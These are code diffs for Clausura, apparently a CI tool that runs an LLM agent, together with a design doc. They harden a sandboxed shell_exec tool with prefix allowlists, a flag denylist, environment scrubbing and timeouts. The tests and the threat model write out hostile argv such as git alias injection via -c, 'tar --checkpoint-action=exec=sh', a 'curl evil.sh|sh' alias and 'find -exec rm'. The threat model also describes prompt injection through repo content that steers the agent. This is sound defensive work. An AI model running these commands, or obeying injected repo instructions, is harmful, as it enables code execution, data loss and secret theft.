@@ -1309,17 +1477,18 @@ mod tests {
     #[tokio::test]
     async fn test_shell_exec_no_shell_injection() {
         let (_tmp, root) = setup_workspace();
-        let allowlist = vec!["echo".into()];
-        let tool = ShellExecTool::new(root.clone(), allowlist);
+        let allowlist = vec!["git".into()];
+        let tool = ShellExecTool::new(root.clone(), allowlist, 120, vec![]);
 
         // Metacharacters must be passed through as literal argv elements,
-        // not interpreted by a shell.
+        // not interpreted by a shell. git rejects the whole string as an
+        // unknown subcommand and echoes it back in its error message.
         let result = tool
-            .execute(serde_json::json!({"argv": ["echo", "hello; touch INJECTION_MARKER"]}))
+            .execute(serde_json::json!({"argv": ["git", "status; touch INJECTION_MARKER"]}))
             .await
             .unwrap();
         assert!(
-            result.contains("hello; touch INJECTION_MARKER"),
+            result.contains("status; touch INJECTION_MARKER"),
             "Expected literal metacharacters in output, got: {}",
             result
         );
@@ -1329,11 +1498,13 @@ mod tests {
         );
     }
 
+    // echo is a shell builtin on Windows, not an executable — unix only.
+    #[cfg(unix)]
     #[tokio::test]
     async fn test_shell_exec_output_truncation() {
         let (_tmp, root) = setup_workspace();
         let allowlist = vec!["echo".into()];
-        let tool = ShellExecTool::new(root, allowlist);
+        let tool = ShellExecTool::new(root, allowlist, 120, vec![]);
 
         // 40 KB single argument → output exceeds the 32KB limit
         let big = "x".repeat(40 * 1024);
@@ -1576,7 +1747,7 @@ mod tests {
     #[test]
     fn test_default_tools_contains_all() {
         let (_tmp, root) = setup_workspace();
-        let registry = default_tools(root, &[]);
+        let registry = default_tools(root, &[], 120, &[]);
         let defs = registry.list_definitions();
         assert_eq!(defs.len(), 5);
         let names: Vec<&str> = defs.iter().map(|d| d.name.as_str()).collect();
@@ -1895,7 +2066,7 @@ mod tests {
         let (_tmp, root) = setup_workspace();
         // Allowlist has "git", command uses "/usr/bin/git style"
         let allowlist = vec!["git".into()];
-        let tool = ShellExecTool::new(root, allowlist);
+        let tool = ShellExecTool::new(root, allowlist, 120, vec![]);
 
         // /usr/bin/git should match because basename is "git"
         let result = tool
@@ -1908,7 +2079,7 @@ mod tests {
     async fn test_shell_exec_rejects_path_traversal_in_command() {
         let (_tmp, root) = setup_workspace();
         let allowlist = vec!["cat".into()];
-        let tool = ShellExecTool::new(root, allowlist);
+        let tool = ShellExecTool::new(root, allowlist, 120, vec![]);
 
         // Even though "cat" is in allowlist, /etc/passwd access should be blocked
         // by the shell's own sandboxing (workspace root). But the allowlist check
@@ -1919,6 +2090,288 @@ mod tests {
         assert!(
             matches!(result, Err(ToolError::SandboxViolation(_))),
             "Should reject /etc/passwd command"
+        );
+    }
+
+    // -----------------------------------------------------------------------
+    // ShellExecTool prefix-rule tests
+    // -----------------------------------------------------------------------
+
+    fn argv(tokens: &[&str]) -> Vec<String> {
+        tokens.iter().map(|s| s.to_string()).collect()
+    }
+
+    #[test]
+    fn test_prefix_rule_allows_subcommand_tree() {
+        let (_tmp, root) = setup_workspace();
+        let tool = ShellExecTool::new(root, vec!["git status".into()], 120, vec![]);
+
+        assert!(tool.check_allowed(&argv(&["git", "status"])).is_ok());
+        assert!(tool
+            .check_allowed(&argv(&["git", "status", "--short"]))
+            .is_ok());
+        assert!(matches!(
+            tool.check_allowed(&argv(&["git", "log"])),
+            Err(ToolError::SandboxViolation(_))
+        ));
+        // argv shorter than the rule prefix never matches
+        assert!(matches!(
+            tool.check_allowed(&argv(&["git"])),
+            Err(ToolError::SandboxViolation(_))
+        ));
+    }
+
+    #[test]
+    fn test_prefix_rule_basename_matches_first_token_only() {
+        let (_tmp, root) = setup_workspace();
+        let tool = ShellExecTool::new(root, vec!["git status".into()], 120, vec![]);
+
+        // Basename convenience applies to argv[0]
+        assert!(tool
+            .check_allowed(&argv(&["/usr/bin/git", "status"]))
+            .is_ok());
+        // ...but not to later tokens: argv[0] must match the rule's first token
+        assert!(matches!(
+            tool.check_allowed(&argv(&["echo", "git", "status"])),
+            Err(ToolError::SandboxViolation(_))
+        ));
+    }
+
+    #[test]
+    fn test_bare_program_name_allows_any_subcommand() {
+        let (_tmp, root) = setup_workspace();
+        // Backward compatible: a bare name is a length-1 prefix
+        let tool = ShellExecTool::new(root, vec!["git".into()], 120, vec![]);
+
+        assert!(tool.check_allowed(&argv(&["git"])).is_ok());
+        assert!(tool.check_allowed(&argv(&["git", "log"])).is_ok());
+        assert!(tool
+            .check_allowed(&argv(&["git", "config", "--global", "x", "y"]))
+            .is_ok());
+        assert!(matches!(
+            tool.check_allowed(&argv(&["grep", "foo"])),
+            Err(ToolError::SandboxViolation(_))
+        ));
+    }
+
+    // -----------------------------------------------------------------------
+    // ShellExecTool dangerous-flag denylist tests
+    // -----------------------------------------------------------------------
+
+    #[test]
+    fn test_denylist_git_dash_c() {
+        let (_tmp, root) = setup_workspace();
+        let tool = ShellExecTool::new(root, vec!["git".into()], 120, vec![]);
+
+        for tokens in [
+            &["git", "-c", "alias.x=!id", "status"][..],
+            &["git", "-calias.x=!id", "status"][..],
+            &["git", "--exec-path=/tmp", "status"][..],
+            &["git", "--exec-path", "/tmp", "status"][..],
+            &["git", "--git-dir", "/tmp/x", "status"][..],
+            &["git", "--work-tree=/tmp", "status"][..],
+        ] {
+            let result = tool.check_dangerous_flags(&argv(tokens));
+            assert!(
+                matches!(result, Err(ToolError::SandboxViolation(_))),
+                "argv {:?} should be denied",
+                tokens
+            );
+        }
+    }
+
+    #[test]
+    fn test_denylist_stops_at_double_dash() {
+        let (_tmp, root) = setup_workspace();
+        let tool = ShellExecTool::new(root, vec!["git".into()], 120, vec![]);
+
+        // Tokens after `--` are operands, not flags
+        assert!(tool
+            .check_dangerous_flags(&argv(&["git", "log", "--", "-c"]))
+            .is_ok());
+        assert!(tool
+            .check_dangerous_flags(&argv(&["git", "status"]))
+            .is_ok());
+    }
+
+    #[test]
+    fn test_denylist_tar_checkpoint_action() {
+        let (_tmp, root) = setup_workspace();
+        let tool = ShellExecTool::new(root, vec!["tar".into()], 120, vec![]);
+
+        assert!(matches!(
+            tool.check_dangerous_flags(&argv(&[
+                "tar",
+                "--checkpoint-action=exec=sh",
+                "-cf",
+                "x.tar"
+            ])),
+            Err(ToolError::SandboxViolation(_))
+        ));
+        assert!(matches!(
+            tool.check_dangerous_flags(&argv(&["tar", "--to-command", "sh", "-xf", "x.tar"])),
+            Err(ToolError::SandboxViolation(_))
+        ));
+        assert!(tool
+            .check_dangerous_flags(&argv(&["tar", "-cf", "x.tar", "src"]))
+            .is_ok());
+    }
+
+    #[test]
+    fn test_denylist_ignores_other_programs() {
+        let (_tmp, root) = setup_workspace();
+        let tool = ShellExecTool::new(root, vec!["echo".into()], 120, vec![]);
+
+        // No denylist entry for echo — same tokens are fine
+        assert!(tool
+            .check_dangerous_flags(&argv(&["echo", "-c", "--exec-path=/tmp"]))
+            .is_ok());
+    }
+
+    #[tokio::test]
+    async fn test_denylist_applies_after_allowlist_match() {
+        let (_tmp, root) = setup_workspace();
+        let tool = ShellExecTool::new(root, vec!["git".into()], 120, vec![]);
+
+        let result = tool
+            .execute(serde_json::json!({"argv": ["git", "-c", "alias.x=!id", "status"]}))
+            .await;
+        match result {
+            Err(ToolError::SandboxViolation(msg)) => assert!(msg.contains("-c")),
+            other => panic!("expected SandboxViolation naming -c, got {:?}", other),
+        }
+    }
+
+    // -----------------------------------------------------------------------
+    // build_child_env tests
+    // -----------------------------------------------------------------------
+
+    fn env_get<'a>(env: &'a [(String, String)], name: &str) -> Option<&'a str> {
+        env.iter().find(|(k, _)| k == name).map(|(_, v)| v.as_str())
+    }
+
+    #[test]
+    fn test_build_child_env_fixed_path() {
+        let env = build_child_env(&[], |_| None, false);
+        assert_eq!(env_get(&env, "PATH"), Some("/usr/local/bin:/usr/bin:/bin"));
+    }
+
+    #[test]
+    fn test_build_child_env_adds_cargo_bin_when_present() {
+        let lookup = |name: &str| (name == "HOME").then(|| "/home/u".to_string());
+        let env = build_child_env(&[], lookup, true);
+        assert_eq!(
+            env_get(&env, "PATH"),
+            Some("/usr/local/bin:/usr/bin:/bin:/home/u/.cargo/bin")
+        );
+        // Not appended when the directory does not exist
+        let env = build_child_env(&[], lookup, false);
+        assert_eq!(env_get(&env, "PATH"), Some("/usr/local/bin:/usr/bin:/bin"));
+    }
+
+    #[test]
+    fn test_build_child_env_forwards_keep_list() {
+        let lookup = |name: &str| match name {
+            "HOME" => Some("/home/u".to_string()),
+            "TERM" => Some("xterm".to_string()),
+            "CI" => Some("true".to_string()),
+            "SECRET_THING" => Some("nope".to_string()),
+            _ => None,
+        };
+        let env = build_child_env(&[], lookup, false);
+        assert_eq!(env_get(&env, "HOME"), Some("/home/u"));
+        assert_eq!(env_get(&env, "TERM"), Some("xterm"));
+        assert_eq!(env_get(&env, "CI"), Some("true"));
+        // Absent keep-list vars are simply not set
+        assert_eq!(env_get(&env, "LANG"), None);
+        assert_eq!(env_get(&env, "TMPDIR"), None);
+        // Anything not in the keep-list is dropped
+        assert_eq!(env_get(&env, "SECRET_THING"), None);
+    }
+
+    #[test]
+    fn test_build_child_env_passthrough_exact_names() {
+        let lookup = |name: &str| match name {
+            "HTTP_PROXY" => Some("http://proxy:8080".to_string()),
+            _ => None,
+        };
+        let passthrough = vec!["HTTP_PROXY".to_string(), "NO_PROXY".to_string()];
+        let env = build_child_env(&passthrough, lookup, false);
+        assert_eq!(env_get(&env, "HTTP_PROXY"), Some("http://proxy:8080"));
+        // Requested but absent in the parent → skipped
+        assert_eq!(env_get(&env, "NO_PROXY"), None);
+    }
+
+    #[test]
+    fn test_build_child_env_refuses_secret_passthrough() {
+        let lookup = |name: &str| Some(format!("value-of-{}", name));
+        let passthrough = vec![
+            "CLAUSURA_API_KEY".to_string(),
+            "AWS_KEY".to_string(),
+            "MY_TOKEN".to_string(),
+            "APP_SECRET".to_string(),
+            "DB_PASSWORD".to_string(),
+            "HTTP_PROXY".to_string(),
+        ];
+        let env = build_child_env(&passthrough, lookup, false);
+        for name in [
+            "CLAUSURA_API_KEY",
+            "AWS_KEY",
+            "MY_TOKEN",
+            "APP_SECRET",
+            "DB_PASSWORD",
+        ] {
+            assert_eq!(env_get(&env, name), None, "{} must be refused", name);
+        }
+        assert_eq!(env_get(&env, "HTTP_PROXY"), Some("value-of-HTTP_PROXY"));
+    }
+
+    #[test]
+    fn test_build_child_env_safety_overrides() {
+        let env = build_child_env(&[], |_| None, false);
+        assert_eq!(env_get(&env, "GIT_PAGER"), Some("cat"));
+        assert_eq!(env_get(&env, "PAGER"), Some("cat"));
+        assert_eq!(env_get(&env, "GIT_CONFIG_NOSYSTEM"), Some("1"));
+        assert_eq!(env_get(&env, "GIT_TERMINAL_PROMPT"), Some("0"));
+        assert_eq!(env_get(&env, "GIT_EDITOR"), Some(":"));
+        assert_eq!(env_get(&env, "EDITOR"), Some(":"));
+    }
+
+    // -----------------------------------------------------------------------
+    // ShellExecTool timeout tests
+    // -----------------------------------------------------------------------
+
+    // sleep is not available on Windows — unix only.
+    #[cfg(unix)]
+    #[tokio::test]
+    async fn test_shell_exec_timeout_kills_command() {
+        let (_tmp, root) = setup_workspace();
+        let tool = ShellExecTool::new(root, vec!["sleep".into()], 1, vec![]);
+
+        let result = tool
+            .execute(serde_json::json!({"argv": ["sleep", "5"]}))
+            .await
+            .unwrap();
+        assert!(
+            result.contains("Command timed out after 1s and was killed"),
+            "Expected timeout message, got: {}",
+            result
+        );
+    }
+
+    #[tokio::test]
+    async fn test_shell_exec_fast_command_completes() {
+        let (_tmp, root) = setup_workspace();
+        let tool = ShellExecTool::new(root, vec!["git".into()], 120, vec![]);
+
+        let result = tool
+            .execute(serde_json::json!({"argv": ["git", "--version"]}))
+            .await
+            .unwrap();
+        assert!(
+            result.contains("git version"),
+            "Expected git version output, got: {}",
+            result
         );
     }
 }

--- a/crates/clausura-core/src/tools.rs
+++ b/crates/clausura-core/src/tools.rs
@@ -1050,6 +1050,19 @@ mod tests {
         (tmp, path)
     }
 
+    /// An absolute path that is valid on every platform (`/etc/passwd` is not
+    /// absolute on Windows, where absolute paths need a drive prefix).
+    fn absolute_path() -> String {
+        PathBuf::from(env!("CARGO_MANIFEST_DIR"))
+            .to_string_lossy()
+            .into_owned()
+    }
+
+    /// Normalize Windows path separators so assertions can use `/`.
+    fn normalize_separators(s: &str) -> String {
+        s.replace(std::path::MAIN_SEPARATOR, "/")
+    }
+
     // -----------------------------------------------------------------------
     // ReadFileTool tests
     // -----------------------------------------------------------------------
@@ -1083,7 +1096,7 @@ mod tests {
         let (_tmp, root) = setup_workspace();
         let tool = ReadFileTool::new(root);
         let result = tool
-            .execute(serde_json::json!({"path": "/etc/passwd"}))
+            .execute(serde_json::json!({"path": absolute_path()}))
             .await;
         assert!(matches!(result, Err(ToolError::SandboxViolation(_))));
     }
@@ -1236,7 +1249,7 @@ mod tests {
     #[tokio::test]
     async fn test_resolve_sandboxed_rejects_absolute() {
         let (_tmp, root) = setup_workspace();
-        let result = resolve_sandboxed_path(&root, "/etc/passwd");
+        let result = resolve_sandboxed_path(&root, &absolute_path());
         assert!(matches!(result, Err(ToolError::SandboxViolation(_))));
     }
 
@@ -1558,6 +1571,7 @@ mod tests {
             .execute(serde_json::json!({"path": ".", "max_depth": 2}))
             .await
             .unwrap();
+        let result = normalize_separators(&result);
         let lines: Vec<&str> = result.lines().collect();
         assert!(lines.contains(&"top.txt"));
         assert!(lines.contains(&"sub/"));
@@ -1605,7 +1619,9 @@ mod tests {
     async fn test_list_files_rejects_absolute() {
         let (_tmp, root) = setup_workspace();
         let tool = ListFilesTool::new(root);
-        let result = tool.execute(serde_json::json!({"path": "/etc"})).await;
+        let result = tool
+            .execute(serde_json::json!({"path": absolute_path()}))
+            .await;
         assert!(matches!(result, Err(ToolError::SandboxViolation(_))));
     }
 
@@ -1664,6 +1680,7 @@ mod tests {
             .execute(serde_json::json!({"path": ".", "max_depth": 5}))
             .await
             .unwrap();
+        let result = normalize_separators(&result);
         assert!(
             result.contains("a/top.txt"),
             "Expected a/top.txt in output:\n{}",

--- a/crates/clausura-core/src/types.rs
+++ b/crates/clausura-core/src/types.rs
@@ -385,6 +385,10 @@ pub struct TaskContract {
     pub tool_allowlist: Vec<String>,
     pub token_budget: u64,
     pub timeout_secs: u64,
+    #[serde(default = "default_shell_timeout_secs")]
+    pub shell_timeout_secs: u64,
+    #[serde(default)]
+    pub shell_env_passthrough: Vec<String>,
     #[serde(default = "default_ambiguity_policy")]
     pub ambiguity_policy: AmbiguityPolicy,
     #[serde(default)]
@@ -397,6 +401,10 @@ pub struct TaskContract {
 
 fn default_max_iterations() -> u32 {
     10
+}
+
+fn default_shell_timeout_secs() -> u64 {
+    120
 }
 
 fn default_ambiguity_policy() -> AmbiguityPolicy {
@@ -617,6 +625,8 @@ mod tests {
             tool_allowlist: vec![],
             token_budget: 32000,
             timeout_secs: 300,
+            shell_timeout_secs: 120,
+            shell_env_passthrough: vec![],
             ambiguity_policy: AmbiguityPolicy::FailClosed,
             gating_rules: vec![],
             max_iterations: 10,

--- a/docs/allowlist-hardening.md
+++ b/docs/allowlist-hardening.md
@@ -179,15 +179,16 @@ tool, extended.
 ## 5. Recommendation (phased)
 
 **Phase 1 — config-compatible hardening (next minor release):**
-A + B + C + E-timeout.
+A + B + C + E-timeout. (Details settled in §6 Decisions.)
 
 - Rules become prefixes (`"git status"`); bare names unchanged in meaning.
-- Small built-in flag denylist for `git` (`-c`, `--exec-path`, `--git-dir`,
-  `--work-tree`), `tar` (`--checkpoint-action`, `--to-command`).
-- Minimal env for spawned commands; never forward `CLAUSURA_API_KEY`;
-  fixed PATH.
-- 60s default per-command timeout (`task.shell_timeout_secs`, env
-  `CLAUSURA_SHELL_TIMEOUT`).
+- Built-in flag denylist (token matching, D1) for `git` (`-c`,
+  `--exec-path`, `--git-dir`, `--work-tree`), `tar`
+  (`--checkpoint-action`, `--to-command`).
+- Whitelisted minimal env for spawned commands (D2); never forward
+  `CLAUSURA_API_KEY`; fixed PATH.
+- 120s default per-command timeout (`task.shell_timeout_secs`, env
+  `CLAUSURA_SHELL_TIMEOUT`), global policy (D3).
 
 All four are ~150 lines total, fully covered by unit tests, and keep
 existing configs working.
@@ -201,18 +202,69 @@ gets Seatbelt. Document Docker as the always-available strong option.
 G: evaluate replacing common `shell_exec` use cases with structured tools;
 keep `shell_exec` only for advanced use, off by default (as today).
 
-## 6. Open questions
+## 6. Decisions (resolved 2026-07-25)
 
-1. Should flag-injection-resistant matching (B) parse each program's args
-   properly (getopt-style), or is a substring/token denylist enough?
-   (Proposal: token denylist — simple, predictable, auditable.)
-2. Env scrubbing: do real CI setups need any inherited vars beyond
-   PATH/HOME/TERM/LANG/CI? (Needs a compat knob: `shell_env_passthrough: [...]`.)
-3. Is per-rule timeout/env/policy syntax needed, or is one global policy
-   enough for v1? (Proposal: global for Phase 1.)
-4. Windows support for `shell_exec` is currently untested
-   (`#[cfg(unix)]` tests); Phase 2 has no Windows story at all — document
-   Docker/WSL as the answer?
+The original open questions were discussed and settled as follows.
+
+### D1. Dangerous-flag matching: token denylist, not getopt parsing
+
+A full getopt-accurate parser needs per-program option tables (which flags
+take values, short-flag clustering, subcommand boundaries) — unbounded
+complexity that is never complete, and it still cannot see attacks through
+the program's own config surface (e.g. `core.pager` in a poisoned repo
+`.git/config`, which needs no flag at all). Therefore:
+
+- Denylist entries match argv tokens in all three forms: exact (`-c`),
+  attached short-option (`-cfoo=bar`), and long-option prefix
+  (`--exec-path`, `--exec-path=...`).
+- Matching stops at the `--` terminator; tokens after it are operands and
+  are not checked.
+- Residual program-config risk is closed via the environment layer (D2):
+  `GIT_PAGER=cat`, `GIT_CONFIG_NOSYSTEM=1`, etc.
+
+### D2. Environment: deny-by-default whitelist + exact-name passthrough
+
+- Default keep-list: `PATH` (fixed value
+  `/usr/local/bin:/usr/bin:/bin`, plus `$HOME/.cargo/bin` if it exists —
+  rustup installs cargo there), `HOME`, `TERM`, `LANG`, `TMPDIR`, `CI`.
+- Never forwarded, even if requested: `CLAUSURA_API_KEY` and any
+  `*_KEY` / `*_TOKEN` / `*_SECRET` / `*_PASSWORD`; loader hijack vars
+  (`LD_PRELOAD`, `LD_LIBRARY_PATH`, `DYLD_*`); runtime injection vars
+  (`BASH_ENV`, `ENV`, `PYTHONPATH`, `PERL5LIB`, `RUBYLIB`, `NODE_OPTIONS`,
+  `RUSTFLAGS`); git attack surface (`GIT_SSH_COMMAND`, `GIT_ASKPASS`,
+  `GIT_CONFIG_GLOBAL`, `GIT_CONFIG_SYSTEM`, `GIT_CONFIG_COUNT`,
+  `GIT_CONFIG_KEY_*`, `GIT_CONFIG_VALUE_*`); `SSH_AUTH_SOCK`.
+- Safety overrides we set ourselves: `GIT_PAGER=cat`, `PAGER=cat`,
+  `GIT_CONFIG_NOSYSTEM=1`, `GIT_TERMINAL_PROMPT=0`, `GIT_EDITOR=:`,
+  `EDITOR=:`.
+- Escape hatch: `shell_env_passthrough: ["HTTP_PROXY", ...]` — **exact
+  variable names only, no globs**; secret-pattern names listed here are
+  refused with a warning (fail-closed).
+
+### D3. Policy granularity: global for Phase 1
+
+- `shell_timeout_secs`: one global per-command timeout, default **120s**
+  (it is a hang safeguard, not the fork-bomb defense — rlimits are a
+  separate concern — so the default favors legitimate slow commands).
+- `shell_env_passthrough`: global (D2).
+- Evolution path: `tool_allowlist` stays a flat string array; per-rule
+  policy, if ever needed, lands as a new `tool_policy` key — a
+  non-breaking addition. Matching precedence (longest-prefix-wins) is
+  deferred until then.
+
+### D4. Windows: documented non-goal, WSL2/Docker is the answer
+
+- Supported platforms are Linux and macOS. Windows is complex to sandbox
+  properly (restricted tokens are a separate engineering effort) and the
+  tool is CI-native where Linux dominates — **Windows users should use
+  WSL2 or the Docker image**. Documented as a non-goal, not "not yet".
+- Keep the door open: Phase 1 code avoids unix-only APIs; unix-specific
+  scrub entries are "remove if present", never "must exist", so the code
+  keeps compiling on Windows.
+- Add a `windows-latest` leg to the CI test matrix to enforce that
+  (compile + non-unix-gated tests must pass).
+- Phase 2 `sandbox: bwrap|seatbelt` on Windows errors out explicitly —
+  no silent degradation.
 
 ## 7. References
 

--- a/docs/allowlist-hardening.md
+++ b/docs/allowlist-hardening.md
@@ -1,0 +1,228 @@
+# Hardening the `shell_exec` Allowlist — Research
+
+Status: research / proposal (no code changes on this branch)
+Branch: `research/allowlist-hardening`
+Date: 2026-07-25
+
+## 1. Current state
+
+Since v1.0.9, `ShellExecTool` (`crates/clausura-core/src/tools.rs`):
+
+- Takes `argv: string[]` and executes `Command::new(&argv[0]).args(&argv[1..])`
+  directly — **no shell is involved**, so `;`, `|`, `$()`, `>`, globbing and
+  variable expansion are inert.
+- The allowlist (`task.tool_allowlist` in `.clausura.yaml`, a flat
+  `Vec<String>`) is matched against `argv[0]` only, by raw token or basename.
+- Empty allowlist (default) disables the tool entirely.
+- Output is truncated at 32KB / 1000 lines; the process inherits the full
+  parent environment and runs with `current_dir = workspace_root`.
+
+This closed the *shell-parsing* class of bypasses. What remains is the
+*allowlist model* itself.
+
+## 2. Threat model
+
+Clausura runs an LLM agent loop against an untrusted codebase in CI. The
+attacker model is:
+
+1. **Prompt injection via repo content** — a PR plants instructions in
+   source files / issues / diff text that steer the LLM into emitting a
+   malicious `shell_exec` call.
+2. **Malicious repo artifacts** — scripts, config files (`.gitconfig`,
+   `.cargo/config.toml`, `Makefile`), or binaries inside the checked-out repo.
+3. **Allowed-binary abuse** — the LLM is tricked into using a *legitimate*
+   allowlisted program with dangerous arguments. Examples, all possible
+   today with `tool_allowlist: [git, tar, find]`:
+   - `git -c alias.status=!id status` (alias injection via `-c`)
+   - `git config --global alias.x "!curl evil.sh|sh"` (writes outside workspace)
+   - `tar --checkpoint-action=exec=sh ...`
+   - `find . -exec rm {} +`
+   - any program reading `$CLAUSURA_API_KEY` and exfiltrating it via args
+     (e.g. `curl -d $KEY` — but note argv elements are literal; the *LLM*
+     can read env-derived secrets from earlier tool output and embed them)
+4. **Environment subversion** — inherited env vars change the behavior of
+   allowlisted binaries: `PATH` hijacking, `LD_PRELOAD`, `GIT_SSH_COMMAND`,
+   `GIT_CONFIG_GLOBAL`/`GIT_CONFIG_COUNT`, `BASH_ENV`, `RUSTFLAGS`, etc.
+5. **Filesystem escape via arguments** — allowlisted commands run with cwd
+   in the workspace but can read/write absolute paths (`cp /etc/shadow ./x`
+   if `cp` were allowed, `git config --global` writing to `$HOME`).
+6. **Network exfiltration** — nothing prevents an allowlisted tool with
+   network ability (`curl`, `git push`, package managers) from sending data
+   out.
+7. **Resource exhaustion** — no per-command timeout or output/rlimits beyond
+   the post-hoc output truncation; `yes` or a fork bomb allowed by name
+   would hang the task until the wall-clock timeout.
+
+## 3. Options survey
+
+### A. argv-prefix rules (per-subcommand granularity)
+
+Allowlist entries become argv *prefixes* instead of bare program names:
+
+```yaml
+tool_allowlist:
+  - "git status"      # exact prefix: argv must start with ["git", "status"]
+  - "git diff"
+  - "cargo test"
+```
+
+Matching: tokenize the rule, require `argv[..rule.len()] == rule_tokens`.
+This is the model Claude Code uses for permissions
+(`Bash(git status:*)` / `Bash(npm run test:)` prefix rules, first-match-wins,
+see [Claude Code permissions](https://blog.vincentqiao.com/en/posts/claude-code-permissions/)
+and [headless CI guidance](https://heyclau.de/entry/guides/headless-claude-code-automation-from-scripts-and-ci)).
+
+- **Security gain**: high. Kills `find -exec`, `tar --checkpoint-action`,
+  and whole dangerous subcommand surfaces (`git config`, `git push`).
+- **Cost**: low. `check_allowed` compares token slices; config stays a
+  `Vec<String>` — bare names keep today's meaning (prefix of length 1),
+  so it's backward compatible.
+- **Limitation**: flags before the subcommand (`git -c alias.x=!id status`)
+  defeat naive prefix matching; needs rule B or flag-position-aware matching.
+
+### B. Per-program flag denylist / argument validators
+
+For known-risky programs, reject dangerous flags regardless of position:
+
+- `git`: deny `-c`, `--exec-path`, `-p/--paginate` is harmless but
+  `--git-dir`, `--work-tree` redirect the repo context
+- `tar`: deny `--checkpoint-action`, `--to-command`
+- generic: deny any arg that resolves to a path outside the workspace
+  (see D)
+
+- **Security gain**: medium-high, closes the flag-position hole in A.
+- **Cost**: medium. Per-program knowledge is inherently incomplete; must be
+  layered on A, not standalone. Fail-closed default: unknown flags are fine
+  (they're just args), known-bad flags are rejected.
+
+### C. Environment scrubbing + controlled PATH
+
+Execute with a minimal, explicit environment:
+
+- `env_clear()` then re-add an allowlist: `PATH` (fixed value, e.g.
+  `/usr/bin:/bin:/usr/local/bin`), `HOME`, `TERM`, `LANG`, CI vars if needed.
+- Critically: **do not forward `CLAUSURA_API_KEY` or any `*_KEY`/`*_TOKEN`**
+  to spawned commands, and scrub `LD_PRELOAD`, `DYLD_INSERT_LIBRARIES`,
+  `GIT_SSH_COMMAND`, `GIT_CONFIG_GLOBAL`, `BASH_ENV`, `ENV`, `RUSTFLAGS`.
+- Resolving `argv[0]` against the fixed PATH (not inherited PATH) prevents
+  PATH hijacking.
+
+- **Security gain**: high per unit effort. Neutralizes threat #4 and
+  shrinks #3/#6 (secrets no longer visible to child processes).
+- **Cost**: low. ~30 lines + tests.
+
+### D. Workspace confinement for path arguments
+
+Reject or rewrite path arguments that escape the workspace, reusing
+`resolve_sandboxed_path` semantics: absolute paths outside the workspace or
+`..` escapes in args → SandboxViolation.
+
+- **Security gain**: medium (threat #5). Not perfect — programs have
+  non-obvious ways to touch files (config in `$HOME`), which is why E/F exist.
+- **Cost**: medium. False positives for legitimately external paths
+  (e.g. `git` reading `$HOME/.gitconfig` is internal to the program and
+  unaffected; only *arguments* are checked).
+
+### E. Per-command resource limits
+
+- Hard timeout per invocation (e.g. 60s, configurable) via
+  `tokio::time::timeout` + `kill()`; independent of the task wall clock.
+- Optional `rlimit` (CPU, address space, no core dumps, process count) via
+  `pre_exec` on Unix.
+
+- **Security gain**: medium (threat #7). Also improves CI reliability.
+- **Cost**: low for the timeout; medium for rlimits (unsafe `pre_exec`).
+
+### F. OS-level sandbox (strongest, platform-specific)
+
+Wrap execution in a kernel sandbox:
+
+- **Linux**: `bubblewrap` (filesystem view: workspace rw, everything else ro,
+  no network) or Landlock+seccomp directly. This is what OpenAI Codex CLI
+  does — [Seatbelt on macOS, Landlock+seccomp on Linux, no outgoing network
+  by default](https://github.com/simonw/research) (see also
+  [Codex sandbox analysis](https://agent-safehouse.dev/docs/agent-investigations/codex)
+  and [this deep dive](https://blog.checo.cc/posts/AI/9.html)).
+- **macOS**: `sandbox-exec` (Seatbelt) with a generated profile
+  (deprecated but functional; Codex still uses it).
+- **Fallback**: run the whole task in the existing Docker image — CI users
+  already have this option.
+
+- **Security gain**: highest; defends in depth even if A–E have gaps,
+  including network denial (#6) and write confinement (#5).
+- **Cost**: high. Platform-specific, needs graceful degradation when
+  bubblewrap/Seatbelt is unavailable (distro kernels, WSL restrictions —
+  Codex hits this in practice). Not a first step.
+
+### G. Replace `shell_exec` with structured narrow tools
+
+Long-term direction: drop generic command execution in favor of
+purpose-built tools (`run_tests`, `git_log`, `list_branches`...) whose
+parameters are data, not argv. Same philosophy as the existing `git_diff`
+tool, extended.
+
+- **Security gain**: very high (no arbitrary execution surface at all).
+- **Cost**: high; reduces flexibility; needs per-use-case design.
+
+## 4. Comparison
+
+| Option | Threats addressed | Security gain | Effort | Portability | Backwards compatible |
+|--------|-------------------|---------------|--------|-------------|----------------------|
+| A. argv-prefix rules | #3 (subcommands) | High | Low | All | Yes (bare name = len-1 prefix) |
+| B. flag denylist | #3 (flag injection) | Med-High | Medium | All | Yes |
+| C. env scrubbing | #4, leaks via #3/#6 | High | Low | All (unix-focused) | Mostly (edge: workflows relying on inherited env) |
+| D. path-arg confinement | #5 | Medium | Medium | All | Mostly |
+| E. timeouts/rlimits | #7 | Medium | Low-Med | rlimits are unix-only | Yes |
+| F. OS sandbox | #5, #6, depth | Highest | High | Linux/macOS divergent | Yes (opt-in) |
+| G. structured tools | all of #3–#5 | Very high | High | All | No (breaking) |
+
+## 5. Recommendation (phased)
+
+**Phase 1 — config-compatible hardening (next minor release):**
+A + B + C + E-timeout.
+
+- Rules become prefixes (`"git status"`); bare names unchanged in meaning.
+- Small built-in flag denylist for `git` (`-c`, `--exec-path`, `--git-dir`,
+  `--work-tree`), `tar` (`--checkpoint-action`, `--to-command`).
+- Minimal env for spawned commands; never forward `CLAUSURA_API_KEY`;
+  fixed PATH.
+- 60s default per-command timeout (`task.shell_timeout_secs`, env
+  `CLAUSURA_SHELL_TIMEOUT`).
+
+All four are ~150 lines total, fully covered by unit tests, and keep
+existing configs working.
+
+**Phase 2 — OS sandbox (opt-in):**
+F behind a config flag (`sandbox: auto|bwrap|seatbelt|none`), with
+detection + graceful fallback. CI Linux runners get bubblewrap; local macOS
+gets Seatbelt. Document Docker as the always-available strong option.
+
+**Phase 3 — reduce the surface (major release):**
+G: evaluate replacing common `shell_exec` use cases with structured tools;
+keep `shell_exec` only for advanced use, off by default (as today).
+
+## 6. Open questions
+
+1. Should flag-injection-resistant matching (B) parse each program's args
+   properly (getopt-style), or is a substring/token denylist enough?
+   (Proposal: token denylist — simple, predictable, auditable.)
+2. Env scrubbing: do real CI setups need any inherited vars beyond
+   PATH/HOME/TERM/LANG/CI? (Needs a compat knob: `shell_env_passthrough: [...]`.)
+3. Is per-rule timeout/env/policy syntax needed, or is one global policy
+   enough for v1? (Proposal: global for Phase 1.)
+4. Windows support for `shell_exec` is currently untested
+   (`#[cfg(unix)]` tests); Phase 2 has no Windows story at all — document
+   Docker/WSL as the answer?
+
+## 7. References
+
+- Claude Code permission rules (prefix matching, first-match-wins):
+  https://blog.vincentqiao.com/en/posts/claude-code-permissions/
+- Headless Claude Code in CI (`--allowedTools "Bash(git diff )"`):
